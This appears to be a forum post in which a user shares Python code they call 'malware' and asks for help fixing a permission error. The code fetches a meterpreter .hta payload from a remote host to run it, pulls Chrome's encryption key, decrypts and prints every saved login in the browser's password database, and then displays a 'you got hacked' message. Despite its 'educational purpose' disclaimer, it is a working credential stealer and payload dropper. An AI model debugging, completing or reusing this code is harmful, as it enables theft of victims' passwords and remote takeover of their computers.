Im curretly working on a 'malware' in python. This should download a meterpreter payload and run it, after seal google chrome saved password and show a message box that tell 'You got hacked :)'.
I can't make it opening the payload because it tell me permission denied.
I want it to download the payload in public folder.
this is the code:
#CREATOR:Buckets41
#DO NOT POST WITHOUT PERMISSION
#FOR EDUCATIONAL PURPUSE ONLY
import os
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta
import urllib.request
import PySimpleGUI as sg
urllib.request.urlretrieve("http://192.168.1.202:8080/Y5nCh02GIAue.hta","C:\\Users\\Public\\Downloads")
payload=open("C:\\Users\\Public\\Downloads\\Y5nCh02GIAue.hta")
def chrome_date_and_time(chrome_data):
return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)
def fetching_encryption_key():
local_computer_directory_path = os.path.join(
os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_computer_directory_path, "r", encoding="utf-8") as f:
local_state_data = f.read()
local_state_data = json.loads(local_state_data)
encryption_key = base64.b64decode(
local_state_data["os_crypt"]["encrypted_key"])
encryption_key = encryption_key[5:]
return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
def password_decryption(password, encryption_key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return "No Passwords"
def main():
key = fetching_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromePasswords.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
"order by date_last_used")
for row in cursor.fetchall():
main_url = row[0]
login_page_url = row[1]
user_name = row[2]
decrypted_password = password_decryption(row[3], key)
date_of_creation = row[4]
last_usuage = row[5]
if user_name or decrypted_password:
print(f"Main URL: {main_url}")
print(f"Login URL: {login_page_url}")
print(f"User name: {user_name}")
print(f"Decrypted Password: {decrypted_password}")
else:
continue
if date_of_creation != 86400000000 and date_of_creation:
print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}")
if last_usuage != 86400000000 and last_usuage:
print(f"Last Used: {str(chrome_date_and_time(last_usuage))}")
print("=" * 100)
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
if __name__ == "__main__":
main()
layout = [[sg.Text("YOU JUST GOT HACKED :)")], [sg.Button("OK")]]
window = sg.Window("Buckets41", layout)
while True:
event, values = window.read()
if event == "OK" or event == sg.WIN_CLOSED:
break
window.close()
and this is the error:
Traceback (most recent call last):
File "C:\Users\tommy\Desktop\pentesting\ERROR.py", line 16, in <module>
urllib.request.urlretrieve("http://192.168.1.202:8080/Y5nCh02GIAue.hta","C:\\Users\\Public\\Downloads")
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.496.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 251, in urlretrieve
tfp = open(filename, 'wb')
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\Public\\Downloads'
Thanks!!!
